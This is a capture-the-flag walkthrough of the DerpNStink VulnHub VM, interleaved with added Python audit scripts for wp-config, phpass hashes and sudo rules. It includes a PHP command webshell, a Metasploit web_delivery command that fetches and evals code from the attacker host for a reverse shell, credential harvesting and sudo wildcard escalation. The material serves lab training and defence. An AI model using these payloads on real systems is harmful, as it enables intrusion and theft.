Introduction
VM download: https://www.vulnhub.com/entry/derpnstink-1,221/
Target: import the OVA into VirtualBox
Attacker: Kali Linux
0x001 Information gathering
Scan the network with nmap to find the VM's IP address
nmap -sn 192.168.1.100-254
Nmap scan report for 192.168.1.105
Host is up (0.043s latency).
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
0x002 TCP/UDP port scan
TCP
nmap -n -A -p- 192.168.1.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 16:57 CST
Nmap scan report for 192.168.1.105
Host is up (0.0067s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
UDP
nmap -n -A -sU 192.168.1.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 17:09 CST
Nmap scan report for 192.168.1.105
Host is up (0.0055s latency).
Not shown: 954 closed ports, 45 open|filtered ports
PORT STATE SERVICE VERSION
5353/udp open mdns DNS-based service discovery
| dns-service-discovery:
| 9/tcp workstation
|_ Address=192.168.1.105 fe80:0:0:0:a00:27ff:fe2d:1b31
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
0x003 Reconnaissance
HTTP: flag1 is at line 112 of the page source
<!--http://192.168.1.105/-->
<div>
<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
</div>
FTP requires a username and password; anonymous access is not allowed
nc 192.168.1.105 21
220 (vsFTPd 3.0.2)
USER root
530 Permission denied.
nc 192.168.1.105 21
220 (vsFTPd 3.0.2)
USER stinky
331 Please specify the password.
SSH requires a key (public-key authentication only)
ssh root@192.168.1.105
root@192.168.1.105: Permission denied (publickey).
0x004 Web directory crawling
Burp Spider finds two interesting URLs
http://192.168.1.105/webnotes/
http://192.168.1.105/webnotes/info.txt
dirb
dirb http://192.168.1.105/ -o dirb.log
...output too long, omitted...
Extract the URLs that returned 200 or were found as directories
cat dirb.log | grep "CODE:200" | cut -d" " -f2 > dirburls.txt
cat dirb.log | grep "==> DIRECTORY:" | cut -d" " -f3 >> dirburls.txt
Screenshot the URLs with EyeWitness
eyewitness --web -f /root/dirburls.txt
...
[*] Done! Report written in the /usr/share/eyewitness/01152019_184614 folder!
Would you like to open the report now? [Y/n] Y
Opening the report reveals two interesting URLs
http://192.168.1.105/php/phpmyadmin/ # holds user information; come back to it later, look at the second URL first
http://192.168.1.105/weblog/
The site redirects to http://derpnstink.local/weblog/, so add the domain to the hosts file
echo "192.168.1.105 derpnstink.local" >> /etc/hosts
Visit the blog again
http://derpnstink.local/weblog/
Viewing the source reveals the following URLs; the PHP files listed there do not execute commands
<li>
<h3 style="opacity:70;">Slideshow</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/derp.png</span>
<p></p>
<a></a>
</li>
<li>
<h3 style="opacity:70;">h0m3l4b1t</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php</span>
<p>h0m3l4b1t</p>
<a></a>
</li>
<li>
<h3 style="opacity:70;">h0m3l4b1t</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php</span>
<p>h0m3l4b1t</p>
<a></a>
</li>
<li>
<h3 style="opacity:70;">randonx</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/elidumfy.php</span>
<p>randonx</p>
<a></a>
</li>
<li>
<h3 style="opacity:70;">randonx</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/uoukbgmr.php</span>
<p>randonx</p>
<a></a>
</li>
</ul>
0x005 CMS identification
The page footer shows the site is WordPress; next, run wpscan
wpscan --url http://192.168.1.105/weblog
Visit the blog admin page and try weak credentials: username admin, password admin logs in
0x006 Get a webshell
Upload the webshell through the image upload
cat webshell.php
<?php
system($_GET["cmd"]);
?>
Visit the URL to execute commands
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/webshell.php?cmd=%20ls
Meterpreter shell
msf > use multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set TARGET 1
TARGET => 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.103
lhost => 192.168.1.103
msf exploit(multi/script/web_delivery) > set srvport 8989
srvport => 8989
msf exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.103:4444
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8989/XFHqfm2xqfO
[*] Local IP: http://192.168.1.103:8989/XFHqfm2xqfO
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.103:8989/XFHqfm2xqfO'));"
Run the web_delivery command through the webshell URL
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/webshell.php?cmd=%20php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.1.103:8989/XFHqfm2xqfO%27));%22
The resulting privileges are very low (www-data)
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > pwd
/var/www/html/weblog/wp-content/uploads/slideshow-gallery
meterpreter > shell
Process 2091 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...lines omitted...
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
WordPress database configuration
cat /var/www/html/weblog/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'mysql');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
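The wp-config.php above is what made the rest of the chain possible: WordPress connects as the MySQL root user with a trivial password, and the file is readable by the web server account. The following Python script is an added example (not part of this write-up or of WordPress) that parses the define() lines of a wp-config.php and flags a root DB user, a weak or short password and a world-readable file. The sample configs are constructed; the weak-password list is a small assumed set.

```python
import re
from pathlib import Path

# Constructed sample: the relevant defines from the wp-config.php shown above.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');
define('DB_COLLATE', '');
"""

# Constructed hardened variant: dedicated least-privilege account and a long random password.
HARDENED_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_weblog');
define('DB_PASSWORD', 'Xq7vL2pR9mN4tW8yB3kH6jD1');
define('DB_HOST', 'localhost');
"""

# Matches define('KEY', 'value'); with single or double quotes.
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")

# Assumed list of passwords an installer should never accept.
WEAK_PASSWORDS = {"", "mysql", "root", "password", "wordpress", "admin", "123456"}


def parse_defines(text):
    """Return a dict of the define('KEY', 'value') pairs found in a wp-config.php."""
    return {key: value for key, value in DEFINE_RE.findall(text)}


def audit_wp_config(text):
    """Return a list of findings for the database settings in a wp-config.php body."""
    findings = []
    cfg = parse_defines(text)
    if cfg.get("DB_USER") == "root":
        findings.append("DB_USER is root: WordPress should use a dedicated account "
                        "granted only on its own database")
    password = cfg.get("DB_PASSWORD", "")
    if password.lower() in WEAK_PASSWORDS:
        findings.append("DB_PASSWORD is a common weak password")
    elif len(password) < 12:
        findings.append("DB_PASSWORD is shorter than 12 characters")
    return findings


def audit_wp_config_file(path):
    """Audit a wp-config.php on disk: contents plus whether other users can read it."""
    p = Path(path)
    findings = audit_wp_config(p.read_text())
    mode = p.stat().st_mode & 0o777
    if mode & 0o004:
        findings.append(f"{p} is world-readable (mode {mode:o}); restrict it to the web server user")
    return findings


if __name__ == "__main__":
    for name, body in (("as found", SAMPLE_WP_CONFIG), ("hardened", HARDENED_WP_CONFIG)):
        print(name, audit_wp_config(body) or ["no findings"])
```

A clean run against the hardened variant returns no findings; the config as found returns two. Even with a 0640 file the web server account can still read the credentials, so the durable fix is the least-privilege database user, not file permissions alone.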
0x007 MySQL root access
Log in to http://192.168.1.105/php/phpmyadmin/ with the database credentials found earlier (user root, password mysql)
The wp_users table holds the WordPress users' password hashes; the mysql.user table holds the MySQL users' password hashes
unclestinky's password is a salted hash, so replace it with the known admin hash $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/
The MySQL hash *9B776AFB479B31E8047026F1185E952DD1E530CB corresponds to the password wedgie57 (looked up at https://crackstation.net/)
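Swapping in a known hash works because a WordPress ($P$) hash is self-contained: the cost and the salt are embedded in the stored string, so anyone with write access to wp_users can set any account's password. The following Python is an added example (not code from this write-up or from WordPress) that re-implements the phpass portable hash used by WordPress, generates a hash with the same "$P$B" cost prefix seen above and verifies a password against a stored hash, which is what an incident responder needs to confirm whether an account's hash matches a known value. The algorithm follows Openwall's phpass; the sample password and salt are constructed.

```python
import hashlib
import hmac
import secrets

# phpass alphabet (not standard base64); WordPress "$P$" hashes use this encoding.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data, count):
    """phpass's custom base64: 3 bytes -> 4 chars, little-endian, no padding."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_hash(password, setting):
    """Hash password under a phpass setting: '$P$' + cost char + 8-char salt.

    Returns '*' on a malformed setting, mirroring phpass's failure value so that
    a comparison against any real stored hash can never succeed.
    """
    if setting[:3] not in ("$P$", "$H$"):
        return "*"
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        return "*"
    salt = setting[4:12]
    if len(salt) != 8:
        return "*"
    pw = password.encode()
    # One MD5 over salt+password, then 2**count_log2 chained rounds of MD5(prev + password).
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def make_hash(password, count_log2=8, salt_bytes=None):
    """Create a new hash. WordPress uses count_log2=8, which phpass stores as
    the character ITOA64[8 + 5] = 'B', hence the '$P$B' prefix seen in wp_users."""
    if salt_bytes is None:
        salt_bytes = secrets.token_bytes(6)   # 6 random bytes -> 8 salt chars
    setting = "$P$" + ITOA64[min(count_log2 + 5, 30)] + _encode64(salt_bytes, 6)
    return phpass_hash(password, setting)


def check_password(password, stored):
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)


if __name__ == "__main__":
    # Constructed sample: hash the FTP/MySQL password from this box and verify it.
    h = make_hash("wedgie57")
    print(h, check_password("wedgie57", h), check_password("wedgie58", h))
```

Because the salt travels with the hash, a defender auditing wp_users cannot tell a legitimately reset password from an attacker-planted hash by looking at the value alone; the useful signals are the user_pass change itself (database audit logging or a periodic diff of the table) and the exposure that allowed it, here phpMyAdmin reachable with the root credentials from wp-config.php.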
0x008 Get flag2
Log in as unclestinky with the password admin
http://derpnstink.local/weblog/wp-login.php
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
0x009 Access FTP
ftp://192.168.1.105: user stinky, same password as MySQL (wedgie57)
This yields the SSH key: ftp://192.168.1.105/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
0x010 flag3
Set the permissions on the local key file and connect
chmod 700 ~/.ssh/id_rsa
...output omitted...
stinky@DeRPnStiNK:~$ cat Desktop/flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
A pcap file containing mrderp's WordPress credentials
stinky@DeRPnStiNK:~$ ls Documents/
derpissues.pcap
Open derpissues.pcap in Wireshark
mrderp's password: derpderpderpderpderpderpderp
Switch to the mrderp user
stinky@DeRPnStiNK:~$ su mrderp
Password:
mrderp@DeRPnStiNK:/home/stinky$
mrderp@DeRPnStiNK:~$ cat Desktop/helpdesk.log
Thank you for contacting the Help Desk. Your ticket information and its resolution is
below.
0x011 root and flag4
mrderp@DeRPnStiNK:~$ sudo su
[sudo] password for mrderp:
Sorry, user mrderp is not allowed to execute '/bin/su' as root on DeRPnStiNK.
mrderp@DeRPnStiNK:~$
mrderp is not allowed to run /bin/su
List what sudo does allow with sudo -l
mrderp@DeRPnStiNK:~$ sudo -l
Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~$
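The sudo rule above is the whole privilege-escalation bug: the permitted command is a wildcard under the user's own home directory, so the user can create whatever file matches it. The following Python is an added example (not from this write-up or from sudo) that parses command lines in the "(runas) [TAG:] command" form printed by sudo -l and flags wildcards, commands under user-writable paths, relative paths and ALL; it is the check an administrator could run over sudoers rules before deploying them. The sample rules are constructed: the first is the one from this box, the other two are assumed well-formed rules for contrast.

```python
import os
import re

# Constructed sample: the rule from this box plus two assumed safe rules.
SAMPLE_RULES = [
    "(ALL) /home/mrderp/binaries/derpy*",
    "(ALL) NOPASSWD: /usr/bin/systemctl restart apache2",
    "(root) /usr/local/sbin/derpy-backup",
]

GLOB_CHARS = set("*?[")
# Assumed list of locations an unprivileged user can normally write to.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

RULE_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.*)")


def parse_rule(line):
    """Split one 'sudo -l' command line into (runas, [tags], command). None if unparseable."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    tags = re.findall(r"[A-Z]+(?=:)", m.group("tags"))
    return m.group("runas").strip(), tags, m.group("cmd").strip()


def audit_rule(line, writable_prefixes=USER_WRITABLE_PREFIXES):
    """Return a list of findings for a single rule; an empty list means nothing flagged."""
    parsed = parse_rule(line)
    if parsed is None:
        return ["unparseable rule: " + line]
    runas, tags, cmd = parsed
    path = cmd.split()[0] if cmd else ""
    if path == "ALL":
        return ["ALL commands permitted as (%s)" % runas]
    findings = []
    if any(c in path for c in GLOB_CHARS):
        findings.append("wildcard in command path: any file matching the pattern will be accepted")
    if path.startswith(writable_prefixes):
        findings.append("command lives under a user-writable location and can be replaced")
    if not os.path.isabs(path):
        findings.append("relative command path")
    return findings


def audit_rules(lines):
    """Map each rule to its findings, keeping only the rules that have any."""
    return {line: audit_rule(line) for line in lines if audit_rule(line)}


if __name__ == "__main__":
    for rule, findings in audit_rules(SAMPLE_RULES).items():
        print(rule)
        for f in findings:
            print("  -", f)
```

The rule from this box produces two findings (wildcard and user-writable path); the two assumed rules produce none. The corresponding fix is to point the rule at a fixed, root-owned path outside any user-writable directory, with no glob.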
Create a script named derpy.sh that matches the allowed wildcard
mrderp@DeRPnStiNK:~$ cd /home/mrderp/
mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ echo "/bin/bash" > binaries/derpy.sh
mrderp@DeRPnStiNK:~$ chmod +x binaries/derpy.sh
mrderp@DeRPnStiNK:~$ sudo ./binaries/derpy.sh
root@DeRPnStiNK:~# id
uid=0(root) gid=0(root) groups=0(root)
root@DeRPnStiNK:~# ls -a /root/
.bash_history .compiz/ Desktop/ Downloads/ .ICEauthority .mysql_history .Xauthority
.bashrc .config/ .dmrc .gconf/ .local/ .profile .xsession-errors
.cache/ .dbus/ Documents/ .gvfs/ .mozilla/ .ssh/ .xsession-errors.old
root@DeRPnStiNK:~# cat /root/Desktop/flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) # got flag4
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
root@DeRPnStiNK:~#